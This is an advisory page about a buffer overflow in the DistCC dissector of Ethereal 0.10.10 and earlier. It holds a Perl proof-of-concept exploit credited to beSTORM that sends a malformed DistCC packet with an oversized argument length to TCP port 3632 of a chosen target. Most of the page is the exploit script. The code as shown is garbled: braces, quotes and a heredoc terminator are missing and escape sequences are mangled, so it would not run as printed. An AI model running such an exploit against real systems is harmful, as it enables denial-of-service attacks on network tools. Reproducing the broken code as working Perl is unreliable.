‘Ethereal DistCC Buffer Overflow (Exploit)’


‘As we reported in our previous article: Ethereal DistCC Dissector Overflow, a vulnerability in Ethereal’s DistCC dissector allows attackers to cause Ethereal to crash by overflowing an internal buffer used by Ethereal when it tries to handle DistCC related packets. The following exploit code can be used to test your system for the mentioned vulnerability.’


‘The information has been provided by beSTORM.’


Vulnerable Systems:
 * Ethereal version 0.10.10 and prior

Immune Systems:
 * Ethereal version 0.10.11 or newer

#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-05-10 12:45
# All Rights Reserved – Copyright ™

use IO::Socket;
use strict;

my $target = shift;
my $print_usage = 0;

if (!$target)

 print ‘No target has been supplied, reverting to’;
 $target = ‘’;

print ‘Will attack $target.n’;
my $target_port = 3632;

my $packet =<<END;
DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-gARGV00000003-O2ARGV00000005-WallARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI0000001Bint main()n{n return(0);n}n

print ‘Sending: [$packet]n’;

my $remote = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $target, PeerPort => ‘3632’);

unless ($remote) { die ‘cannot connect to distcc daemon on $target’ }

print $remote $packet;

print ‘Done.n’;

sub usage
 if ($print_usage) { return; }
 $print_usage = 1;
 print (‘#’x50);
 print ‘n’;
 print ‘# $0 [hostname]n’;
 print ‘# hostnamet-tThe host the packet will be sent to.n’;
 print ‘n’;

Categories: Exploits